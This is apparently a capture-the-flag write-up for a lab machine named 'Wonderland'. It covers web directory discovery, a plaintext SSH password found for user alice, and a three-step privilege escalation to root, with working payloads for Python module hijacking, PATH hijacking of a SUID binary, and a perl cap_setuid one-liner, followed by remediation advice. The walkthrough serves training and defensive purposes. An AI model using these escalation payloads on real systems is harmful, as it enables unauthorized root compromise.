Target IP: 10.48.137.121
Difficulty: Medium
Objective: User (user.txt) & Root (root.txt)
1. Executive Summary
“Wonderland” is a Linux machine that requires a multi-stage privilege escalation path. Initial access is obtained by discovering hidden directories (/r/a/b/b/i/t) containing credentials. The path to root involves three distinct lateral movement and escalation techniques: Python Module Hijacking (abusing import priority), PATH Variable Hijacking (abusing relative binary calls in SUID executables), and Linux Capability Abuse (exploiting setuid capabilities on the Perl binary).
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Directory Fuzzing.
- T1078 (Valid Accounts): SSH Credential Reuse.
- T1574.008 (Hijack Execution Flow: Path Interception): Python
importhijacking and LinuxPATHmanipulation. - T1548.001 (Setuid and Setgid): Exploiting capabilities (
getcap).
2. Enumeration
A. Network Scanning
- 22/tcp (SSH): OpenSSH 7.6p1.
- 80/tcp (HTTP): Golang HTTP Server.
B. Web Enumeration
- Directory Discovery: The site directs you to “Follow the White Rabbit.”
- Manual or recursive discovery reveals the directory structure:
/r/a/b/b/i/t.
- Credential Discovery:
- Checking the source code or the page at the end of the directory chain reveals credentials for alice:
- User:
alice - Password:
HowDothTheLittleCrocodileImproveHisShiningTail
3. Privilege Escalation Chain
Step 1: Alice → Rabbit (Python Module Hijacking)
Analysis:
The user alice can run a python script as rabbit via sudo:
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py.
The script contains the line import random.
The Exploit:
Python searches for modules in the Current Working Directory (CWD) before checking the standard library paths. By creating a file named random.py in the same directory as the script (/home/alice), we force Python to load our malicious code instead of the real random module.
- Create Payload:
# /home/alice/random.py
import os
os.system("/bin/bash")- Execute:
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.pyStatus: User rabbit.
Step 2: Rabbit → Hatter (PATH Hijacking)
Analysis:
The user rabbit has a SUID binary teaParty. Running strings or ltrace on it reveals it calls the date command without an absolute path (e.g., it calls date instead of /bin/date).
The Exploit:
When a command is called without a full path, the shell searches the directories listed in the $PATH variable from left to right. We can insert our current directory at the start of the PATH variable so the shell finds our malicious date script before the real one.
- Create Payload:
# /home/rabbit/date
#!/bin/sh
/bin/bash(Remember to chmod +x date).
2. Manipulate PATH:
export PATH=/home/rabbit:$PATH- Execute:
./teaPartyStatus: User hatter.
Step 3: Hatter → Root (Capability Abuse)
Analysis:
Enumeration (using linpeas or manual checking) reveals a binary with empty capabilities.
getcap -r / 2>/dev/null
# /usr/bin/perl = cap_setuid+epThe Exploit:
Linux Capabilities break down the “all-powerful” root privilege into distinct units. cap_setuid+ep allows the perl binary to change its User ID (UID) to any other user, including root (UID 0), without needing standard SUID permissions.
- Execute:
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'Status: root.
4. Remediation (Blue Team)
- Python Script Security:
- Avoid running scripts from user-writable directories via sudo.
- Use absolute imports or restrict
PYTHONPATH.
- Binary Security (SUID):
- Always use absolute paths (e.g.,
/bin/date) inside compiled binaries when calling system commands. - Sanitize the environment variables within the binary to ignore the user’s
$PATH.
- Capabilities:
- Regularly audit capabilities using
getcap. - Remove dangerous capabilities like
cap_setuidfrom interpreters likeperl,python, ortarunless strictly necessary.